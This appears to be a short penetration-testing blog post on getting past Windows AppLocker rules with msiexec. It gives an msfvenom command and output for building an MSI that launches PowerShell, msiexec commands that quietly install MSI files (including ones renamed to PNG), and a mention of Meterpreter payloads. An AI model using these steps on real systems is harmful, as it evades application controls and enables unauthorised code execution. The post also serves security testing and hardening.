AppLocker Bypass – MSIEXEC

MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems that are configured not to block execution of MSI files for all users are not properly protected as any AppLocker executable rule can be bypassed easily.

Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
MsfVenom - Generating MSI Files
MsfVenom – Generating MSI Files

Execution of powershell.msi will open a PowerShell session bypassing the AppLocker rule that deny the use of PowerShell for all users.

MSIEXEC - PowerShell
MSIEXEC – PowerShell

It is also possible to run the command below either from a command prompt or if it is blocked through Windows Run.

msiexec /quiet /i cmd.msi

The command prompt will open.

msiexec - Command Prompt
MSIEXEC – Command Prompt

Alternatively msiexec utility has the ability to run MSI files that have been renamed to PNG. These files can be executed either locally or remotely from a command prompt or from Windows Run bypassing AppLocker rules.

msiexec /q /i
msiexec - Command Prompt via PNG
MSIEXEC – Command Prompt via PNG

The same concept applies and for MSI files that contain Meterpreter payloads.

MSI - Meterpreter Payload
MSI – Meterpreter Payload
MSIEXEC - Meterpreter
MSIEXEC – Meterpreter